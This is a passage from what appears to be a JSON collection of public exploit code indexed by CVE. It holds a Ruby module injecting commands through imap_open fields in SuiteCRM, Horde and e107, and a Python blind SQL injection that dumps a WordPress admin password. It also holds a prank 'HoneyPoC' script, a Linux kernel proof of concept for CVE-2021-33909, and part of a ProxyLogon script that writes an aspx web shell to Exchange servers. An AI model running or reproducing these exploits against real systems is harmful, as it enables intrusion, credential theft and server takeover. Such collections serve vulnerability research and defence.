from form page')\n return\n end\n\n print_good(\"Sending payload with group_id #{group_id}\")\n\n referer = \"http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView\"\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n #required to prevent CSRF protection from triggering\n 'headers' => { 'Referer' => referer},\n 'vars_post' => {\n 'module' => 'InboundEmail',\n 'record' => '',\n 'origin_id' => '',\n 'isDuplicate' => 'false',\n 'action' => 'Save',\n 'group_id' => group_id,\n 'return_module' => '',\n 'return_action' => '',\n 'return_id' => '',\n 'personal' => '',\n 'searchField' => '',\n 'mailbox_type' => '',\n 'button' => ' Save ',\n 'name' => Rex::Text.rand_text_alphanumeric(8),\n 'status' => 'Active',\n 'server_url' => \"x #{command}}\",\n 'email_user' => Rex::Text.rand_text_alphanumeric(8),\n 'protocol' => 'imap',\n 'email_password' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'mailbox' => 'INBOX',\n 'trashFolder' => 'TRASH',\n 'sentFolder' => '',\n 'from_name' => Rex::Text.rand_text_alphanumeric(8),\n 'is_auto_import' => 'on',\n 'from_addr' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'reply_to_name' => '',\n 'distrib_method' => 'AOPDefault',\n 'distribution_user_name' => '',\n 'distribution_user_id' => '',\n 'distribution_options[0]' => 'all',\n 'distribution_options[1]' => '',\n 'distribution_options[2]' => '',\n 'create_case_template_id' => '',\n 'reply_to_addr' => '',\n 'template_id' => '',\n 'filter_domain' => '',\n 'email_num_autoreplies_24_hours' => '10',\n 'leaveMessagesOnMailServer' => '1'\n }\n )\n if res && res.code == 200\n print_error('Triggered CSRF protection, may try exploitation manually.')\n end\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /Horde IMP H3/\n # The original EDB module claims \"Version: All IMP versions\", however the current\n # major branch https://github.com/horde/imp/tree/74e3f5fdbac31dfcff15195832c1b9b888767982\n # does not include any reference to imap_open, nor 'test.php' in the root directory.\n # H5 (current) uses the IMP test url: /horde/test.php?app=imp with \"Mail Server Support Test\"\n # as the header:\n # https://github.com/horde/imp/blob/16400fd5f52610d27d59d21fe2e39db2c85837f1/lib/Test.php#L85\n # H3 (~2012) uses the IMP test url: /horde/imp/test.php and \"PHP Mail Server Support Test\"\n # which are the values coded into the python edb exploit.\n print_status(\"Sending Exploit Request\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'imp', 'test.php'),\n 'vars_post' => {\n 'f_submit' => 'Submit',\n 'passwd' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'server' => \"x #{command}}\",\n 'server_type' => 'imap',\n 'user' => Rex::Text.rand_text_alphanumeric(8)\n })\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n elsif target.name =~ /e107v2/\n # e107 has an encoder which prevents $IFS$() from being used as $ = $\n # \\t also became /t, however \"\\t\" does seem to work.\n\n # e107 also uses a cron job to check bounce jobs, which may not be active.\n # either cron can be disabled, or bounce checks disabled, so we try to\n # kick the process manually, however if it doesn't work we'll hope\n # cron is running and we get a call back anyways.\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'),\n 'vars_post' => {\n 'authname' => datastore['USERNAME'],\n 'authpass' => datastore['PASSWORD'],\n 'authsubmit' => 'Log In'\n })\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code == 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n vprint_status('Checking if Cron is enabled for triggering')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n if res.body.include? 'Status: Disabled'\n print_error('Cron disabled, unexploitable.')\n return\n end\n\n print_good('Storing payload in mail settings')\n\n # the imap/pop field is hard to find. Check Users > Mail\n # then check \"Bounced emails - Processing method\" and set it to \"Mail account\"\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'mode' => 'prefs',\n 'action' => 'prefs'\n },\n 'vars_post' => {\n 'testaddress' => 'some_email_address',\n 'testtemplate' => 'textonly',\n 'bulkmailer' => 'smtp',\n 'smtp_server' => '1.1.1.1',\n 'smtp_username' => 'username',\n 'smtp_password' => 'password',\n 'smtp_port' => '25',\n 'smtp_options' => '',\n 'smtp_keepalive' => '0',\n 'smtp_useVERP' => '0',\n 'mail_sendstyle' => 'texthtml',\n 'mail_pause' => '3',\n 'mail_pausetime' => '4',\n 'mail_workpertick' => '5',\n 'mail_log_option' => '0',\n 'mail_bounce' => 'mail',\n 'mail_bounce_email2' => '',\n 'mail_bounce_email' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'mail_bounce_pop3' => \"x #{command(\"\\t\")}}\",\n 'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_type' => 'imap',\n 'mail_bounce_auto' => '1',\n 'updateprefs' => 'Save Changes'\n })\n\n\n vprint_status('Loading cron page to execute job manually')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if /name='e-token' value='(?\\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\\[(?\\d)\\]/m =~ res.body\n print_good(\"Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}\")\n # The post request has several duplicate columns, however all were not required. Left them commented for documentation purposes\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'e-token' => etoken,\n #'e-columns[]' => 'cron_category',\n 'e-columns[]' => 'cron_name',\n #'e-columns[]' => 'cron_description',\n #'e-columns[]' => 'cron_function',\n #'e-columns[]' => 'cron_tab',\n #'e-columns[]' => 'cron_lastrun',\n #'e-columns[]' => 'cron_active',\n \"cron_execute[#{cron_id}]\" => '1',\n 'etrigger_batch' => ''\n })\n\n else\n print_error('e-token not found, required for manual exploitation. Wait 60sec, cron may still trigger.')\n end\n\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /custom/\n print_status('Listener started for 300 seconds')\n print_good(\"POST request connection string: x #{command}}\")\n # URI.encode leaves + as + since that's a space encoded. So we manually change it.\n print_good(\"GET request connection string: #{URI.encode(\"x \" + command + \"}\").sub! '+', '%2B'}\")\n end\n end\nend" + }, + { + "created_at": "2021-07-26T14:12:26Z", + "cve": "CVE-2019-10866", + "urls": [ + "https://github.com/sepehrdaddev/0day-today-exploits/blob/4c60d5a5b65e42e6f67512596926f261fa10b668/32829.txt" + ], + "exploit": "# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: some_host/plugins/\n# Version: 1.13.3\n# Tested on: Ubuntu 18.04\n# CVE : CVE-20**-*****\n\nimport requests\nimport time\n\nsession = requests.Session()\ndictionary = '@._-$/\\\\\"£%&;§+*123'\nflag = True\nusername = \"username\"\npassword = \"password\"\ntemp_password = \"\"\nTIME = 0.5\n\ndef login(username, password):\n payload = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Login',\n 'testcookie': 1\n }\n\ndef print_string(str):\n print \"\\033c\"\n print str\n\ndef get_admin_pass():\n len_pwd = 1\n global flag\n global temp_password\n while flag:\n flag = False\n ch_temp = ''\n for ch in dictionary:\n print_string(\"[*] Password dump: \" + temp_password + ch)\n ch_temp = ch\n start_time = time.time()\n r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n temp_password += ch_temp\n len_pwd += 1\n\nlogin(username, password)\nget_admin_pass()\nprint_string(\"[+] Password found: \" + temp_password)" + }, + { + "created_at": "2021-07-26T16:35:26Z", + "cve": "CVE-2021-22893", + "urls": [ + "https://github.com/ZephrFish/CVE-2021-22893" + ], + "exploit": "# CVE-2021-22893 RCE PoC\n# This is how dangerious not reading the source code is:\n# rm -rvf /*\n\nUSAGE=\"\nBash script to achieve RCE\nFlags:\n-c Target IP Address.\nusage: exploit.sh -c \nexample: exploit.sh -c 10.0.0.1\nexample: exploit.sh -l \nexample: exploit.sh -l ips.txt\n\"\nif [ $# -eq 0 ]; then\n echo \"$USAGE\"\n exit\nfi\necho \"HONEYPOC - NOT A REAL EXPLOIT\"\necho \"[!] Exploiting Host $1 $2\"\necho \"[+] Beginning Erasure of /\"\nsleep 5s\nls -aliRtu /\necho \"[!] Deleted Root File System.\"\nsleep 5s\necho \"We're no strangers to love\"\n# NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Spanish (NX)',\n# {\n# 'Ret' => 0x6fdbf727,\n# 'DisableNX' => 0x6fdc16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\necho \"You know the rules and so do I.\"\n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Finnish (NX)',\n# {\n# 'Ret' => 0x597df727,\n# 'DisableNX' => 0x597e16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 French (NX)',\n# {\n# 'Ret' => 0x595bf727,\n# 'DisableNX' => 0x595c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n echo \"A full commitment's what I'm thinking of.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hebrew (NX)',\n# {\n# 'Ret' => 0x5940f727,\n# 'DisableNX' => 0x594116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hungarian (NX)',\n# {\n# 'Ret' => 0x5970f727,\n# 'DisableNX' => 0x597116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"You wouldn't get this from any other guy.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Italian (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Japanese (NX)',\n# {\n# 'Ret' => 0x567fd3be,\n# 'DisableNX' => 0x568016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"I just wanna tell you how I'm feeling.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Korean (NX)',\n# {\n# 'Ret' => 0x6fd6f727,\n# 'DisableNX' => 0x6fd716e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Dutch (NX)',\n# {\n# 'Ret' => 0x596cf727,\n# 'DisableNX' => 0x596d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Gotta make you understand\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Norwegian (NX)',\n# {\n# 'Ret' => 0x597cf727,\n# 'DisableNX' => 0x597d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Polish (NX)',\n# {\n# 'Ret' => 0x5941f727,\n# 'DisableNX' => 0x594216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna give you up.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese - Brazilian (NX)',\n# {\n# 'Ret' => 0x596ff727,\n# 'DisableNX' => 0x597016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna let you down.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Russian (NX)',\n# {\n# 'Ret' => 0x6fe1f727,\n# 'DisableNX' => 0x6fe216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Swedish (NX)',\n# {\n# 'Ret' => 0x597af727,\n# 'DisableNX' => 0x597b16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna run around and desert you.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Turkish (NX)',\n# {\n# 'Ret' => 0x5a78f727,\n# 'DisableNX' => 0x5a7916e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Arabic (NX)',\n# {\n# 'Ret' => 0x6fd8f807,\n# 'DisableNX' => 0x6fd917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna make you cry.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Simplified (NX)',\n# {\n# 'Ret' => 0x58fbf807,\n# 'DisableNX' => 0x58fc17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna say goodbye.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Czech (NX)',\n# {\n# 'Ret' => 0x6fe1f807,\n# 'DisableNX' => 0x6fe217c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna tell a lie and hurt you.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Danish (NX)',\n# {\n# 'Ret' => 0x5978f807,\n# 'DisableNX' => 0x597917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 German (NX)',\n# {\n# 'Ret' => 0x6fd9f807,\n# 'DisableNX' => 0x6fda17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Greek (NX)',\n# {\n\n\necho \"[!] You should have read the source. HoneyPoC 3.0 - some_host/cve-20**-****-honeypoc/\"" + }, + { + "created_at": "2021-07-26T16:59:10Z", + "cve": "CVE-2021-33909", + "urls": [ + "https://github.com/Liang2580/CVE-2021-33909" + ], + "exploit": "/*\n * CVE-2021-33909: size_t-to-int vulnerability in Linux's filesystem layer\n * Copyright (C) 2021 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define PAGE_SIZE (4096)\n\n#define die() do { \\\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\nstatic void\nsend_recv_state(const int sock, const char * const sstate, const char rstate)\n{\n if (sstate) {\n if (send(sock, sstate, 1, MSG_NOSIGNAL) != 1) die();\n }\n if (rstate) {\n char state = 0;\n if (read(sock, &state, 1) != 1) die();\n if (state != rstate) die();\n }\n}\n\nstatic const char * bigdir;\nstatic char onedir[NAME_MAX + 1];\n\ntypedef struct {\n pid_t pid;\n int socks[2];\n size_t count;\n int delete;\n} t_userns;\n\nstatic int\nuserns_fn(void * const arg)\n{\n if (!arg) die();\n const t_userns * const userns = arg;\n const int sock = userns->socks[1];\n if (close(userns->socks[0])) die();\n\n send_recv_state(sock, NULL, 'A');\n\n size_t n;\n if (chdir(bigdir)) die();\n for (n = 0; n <= userns->count / (1 + (sizeof(onedir)-1) * 4); n++) {\n if (chdir(onedir)) die();\n }\n char device[] = \"./device.XXXXXX\";\n if (!mkdtemp(device)) die();\n char mpoint[] = \"/tmp/mpoint.XXXXXX\";\n if (!mkdtemp(mpoint)) die();\n if (mount(device, mpoint, NULL, MS_BIND, NULL)) die();\n\n if (userns->delete) {\n if (rmdir(device)) die();\n }\n if (chdir(\"/\")) die();\n\n send_recv_state(sock, \"B\", 'C');\n\n const int fd = open(\"/proc/self/mountinfo\", O_RDONLY);\n if (fd <= -1) die();\n static char buf[1UL << 20];\n size_t len = 0;\n for (;;) {\n ssize_t nbr = read(fd, buf, 1024);\n if (nbr <= 0) die();\n for (;;) {\n const char * nl = memchr(buf, '\\n', nbr);\n if (!nl) break;\n nl++;\n if (memmem(buf, nl - buf, \"\\\\134\", 4)) die();\n nbr -= nl - buf;\n memmove(buf, nl, nbr);\n len = 0;\n }\n len += nbr;\n if (memmem(buf, nbr, \"\\\\134\", 4)) break;\n }\n\n send_recv_state(sock, \"D\", 'E');\n die();\n}\n\nstatic void\nupdate_id_map(char * const mapping, const char * const map_file)\n{\n const size_t map_len = strlen(mapping);\n if (map_len >= SSIZE_MAX) die();\n if (map_len <= 0) die();\n\n size_t i;\n for (i = 0; i < map_len; i++) {\n if (mapping[i] == ',')\n mapping[i] = '\\n';\n }\n\n const int fd = open(map_file, O_WRONLY);\n if (fd <= -1) die();\n if (write(fd, mapping, map_len) != (ssize_t)map_len) die();\n if (close(fd)) die();\n}\n\nstatic void\nproc_setgroups_write(const pid_t child_pid, const char * const str)\n{\n const size_t str_len = strlen(str);\n if (str_len >= SSIZE_MAX) die();\n if (str_len <= 0) die();\n\n char setgroups_path[64];\n snprintf(setgroups_path, sizeof(setgroups_path), \"/proc/%ld/setgroups\", (long)child_pid);\n\n const int fd = open(setgroups_path, O_WRONLY);\n if (fd <= -1) {\n if (fd != -1) die();\n if (errno != ENOENT) die();\n return;\n }\n if (write(fd, str, str_len) != (ssize_t)str_len) die();\n if (close(fd)) die();\n}\n\nstatic void\nfork_userns(t_userns * const userns, const size_t size, const int delete)\n{\n static const size_t stack_size = (1UL << 20) + 2 * PAGE_SIZE;\n static char * stack = NULL;\n if (!stack) {\n stack = mmap(NULL, stack_size, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);\n if (!stack || stack == MAP_FAILED) die();\n if (mprotect(stack + PAGE_SIZE, stack_size - 2 * PAGE_SIZE, PROT_READ | PROT_WRITE)) die();\n }\n\n if (!userns) die();\n userns->count = size / 2;\n userns->delete = delete;\n\n if (socketpair(AF_UNIX, SOCK_STREAM, 0, userns->socks)) die();\n userns->pid = clone(userns_fn, stack + stack_size - PAGE_SIZE, CLONE_NEWUSER | CLONE_NEWNS | SIGCHLD, userns);\n if (userns->pid <= -1) die();\n if (close(userns->socks[1])) die();\n userns->socks[1] = -1;\n\n char map_path[64], map_buf[64];\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/uid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", (long)getuid());\n update_id_map(map_buf, map_path);\n\n proc_setgroups_write(userns->pid, \"deny\");\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/gid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", (long)getgid());\n update_id_map(map_buf, map_path);\n\n send_recv_state(*userns->socks, \"A\", 'B');\n}\n\nstatic void\nwait_userns(t_userns * const userns)\n{\n if (!userns) die();\n if (kill(userns->pid, SIGKILL)) die();\n\n int status = 0;\n if (waitpid(userns->pid, &status, 0) != userns->pid) die();\n userns->pid = -1;\n if (!WIFSIGNALED(status)) die();\n if (WTERMSIG(status) != SIGKILL) die();\n\n if (close(*userns->socks)) die();\n *userns->socks = -1;\n}\n\nint\nmain(const int argc, const char * const argv[])\n{\n if (argc != 2) die();\n bigdir = argv[1];\n if (*bigdir != '/') die();\n\n if (sizeof(onedir) != 256) die();\n memset(onedir, '\\\\', sizeof(onedir)-1);\n if (onedir[sizeof(onedir)-1] != '\\0') die();\n\n puts(\"creating directories, please wait...\");\n if (mkdir(bigdir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(bigdir)) die();\n size_t i;\n for (i = 0; i <= (1UL << 30) / (1 + (sizeof(onedir)-1) * 4); i++) {\n if (mkdir(onedir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(onedir)) die();\n }\n if (chdir(\"/\")) die();\n\n static t_userns userns;\n fork_userns(&userns, (1UL << 31), 1);\n puts(\"crashing...\");\n send_recv_state(*userns.socks, \"C\", 'D');\n wait_userns(&userns);\n die();\n}" + }, + { + "created_at": "2021-07-26T17:20:40Z", + "cve": "CVE-2021-27065", + "urls": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065", + "https://github.com/p0wershe11/ProxyLogon" + ], + "exploit": "# -*- encoding: utf-8 -*-\n'''\n-------------------------------------------------------\n@File : ProxyLogon.py\n@Time : 2021/03/13 21:13:01\n@Version : 1.0.0\n@License : \n@Desc : \n@Author : p0wershe11, RGDZ\n-------------------------------------------------------\n'''\n\n\n\nfrom random import Random, randint, random\nimport re\nimport string\nimport sys\nimport json\nimport requests\nfrom urllib.parse import urlencode\nfrom struct import unpack\nfrom base64 import b64encode, b64decode\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass IOFlow(str):\n\n def __init__(self) -> None:\n super().__init__()\n self._cout = sys.stdout\n\n def _write(self, s:str):\n self.cout.write(s)\n\n def __lshift__(self, s: str)->int:\n return self._cout.write(s)\n\nendl = \"\\n\"\ncout = IOFlow()\n\nclass Color:\n START = \"\\033[\"\n END = START+\"0m\"\n \n\n C_RED = START+\"31m\"\n C_GREEN = START+\"32m\"\n C_YELLOW = START+\"33m\"\n C_BLUE = START+\"34m\"\n\n # RANDOM_COLOR = random.choice()\n\nclass Color(Color):\n ALL_COLOR = {k:v for k, v in Color.__dict__.items() if \"C_\" in k}\n _COLOR_S = lambda color, s: color+s+Color.END\n\nclass Color(Color):\n\n RED_S = lambda s: Color._COLOR_S(Color.C_RED, s)\n GREEN_S = lambda s: Color._COLOR_S(Color.C_GREEN, s)\n YELLOW_S = lambda s: Color._COLOR_S(Color.C_YELLOW, s)\n BLUE_S = lambda s: Color._COLOR_S(Color.C_BLUE, s)\n\nclass Log:\n BASE_SYM = lambda sym: f\"{sym}\"\n TEMPLATE = lambda sym, msg: cout << f\"{sym}:{msg}\\n\"\n\nclass Log(Log):\n INFO_SYM = Log.BASE_SYM(Color.BLUE_S(\"[*]\"))\n WARING_SYM = Log.BASE_SYM(Color.YELLOW_S(\"[!]\"))\n SUCCESS_SYM = Log.BASE_SYM(Color.GREEN_S(\"[+]\"))\n\nclass Log(Log):\n info = lambda msg: Log.TEMPLATE(Log.INFO_SYM, msg)\n waring = lambda msg: Log.TEMPLATE(Log.WARING_SYM, msg)\n success = lambda msg: Log.TEMPLATE(Log.SUCCESS_SYM, msg)\n\n\nARGS = [dict(v) for v in [zip(v.split(\"=\")[0::2], v.split(\"=\")[1::2]) for v in sys.argv[1:]]]\n\n\ncheck_argv = lambda arg: arg in sys.argv\n\n\n\nHOST = \"\"\nMAIL = \"\"\nMAILS = \"\"\nLOCAL_NAME = \"\"\n\nascii_letters = string.ascii_letters\nSHELL_NAME = \"\".join(ascii_letters[randint(0, len(ascii_letters)-1)] for i in range(10))\nFILE_PATH = f'C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\{SHELL_NAME}.aspx'\nFILE_DATA = ''\n\n\ndef _unpack_str(byte_string):\n return byte_string.decode('UTF-8').replace('\\x00', '')\n\ndef _unpack_int(format, data):\n return unpack(format, data)[0]\n\n\ndef exploit(path, qs='', data='', cookies=[], headers={}):\n global HOST, LOCAL_NAME\n\n cookies = list(cookies)\n cookies.extend([f\"X-BEResource=a]@{LOCAL_NAME}:444{path}?{qs}#~1941962753\"])\n if not headers:\n headers = {\n 'Content-Type': 'application/json'\n }\n headers['Cookie'] = ';'.join(cookies)\n headers['msExchLogonMailbox'] = 'S-1-5-20'\n\n url = f\"https://{HOST}/ecp/y.js\"\n resp = requests.post(url, headers=headers, data=data, verify=False, allow_redirects=False)\n return resp\n\ndef parse_challenge(auth):\n target_info_field = auth[40:48]\n target_info_len = _unpack_int('H', target_info_field[0:2])\n target_info_offset = _unpack_int('I', target_info_field[4:8])\n\n target_info_bytes = auth[target_info_offset:target_info_offset+target_info_len]\n\n domain_name = ''\n computer_name = ''\n info_offset = 0\n while info_offset < len(target_info_bytes):\n av_id = _unpack_int('H', target_info_bytes[info_offset:info_offset+2])\n av_len = _unpack_int('H', target_info_bytes[info_offset+2:info_offset+4])\n av_value = target_info_bytes[info_offset+4:info_offset+4+av_len]\n\n info_offset = info_offset + 4 + av_len\n if av_id == 2: # MsvAvDnsDomainName\n domain_name = _unpack_str(av_value)\n elif av_id == 3: # MsvAvDnsComputerName\n computer_name = _unpack_str(av_value)\n return domain_name, computer_name\n\ndef get_local_name():\n global LOCAL_NAME\n Log.info(\"Getting ComputerName and DomainName.\")\n ntlm_type1 = (\n b'NTLMSSP\\x00' # NTLMSSp Signature\n b'\\x01\\x00\\x00\\x00' # Message Type\n b'\\x97\\x82\\x08\\xe2' # Flags\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Domain String\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Workstation String\n b'\\x0a\\x00\\xba\\x47\\x00\\x00\\x00\\x0f' # OS Version\n )\n headers = {\n 'Authorization': f'Negotiate {b64encode(ntlm_type1).decode()}'\n }\n # print(headers)\n # assert False\n r = requests.get(f'https://{HOST}/rpc/', headers=headers, verify=False)\n assert r.status_code == 401, \"Error while getting ComputerName\"\n auth_header = r.headers['WWW-Authenticate']\n auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1)\n domain_name, computer_name = parse_challenge(b64decode(auth))\n if not domain_name:\n Log.waring(\"DomainName not found.\")\n return exit(0)\n if not computer_name:\n Log.waring(\"ComputerName not found\")\n return exit(0)\n Log.info(f\"Domain Name = {domain_name}\")\n Log.info(f\"Computer Name = {computer_name}\")\n LOCAL_NAME = computer_name\n\n\ndef get_sid(mail):\n payload = f'''\n\n \n {mail}\n http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\n \n\n'''\n headers = {\n 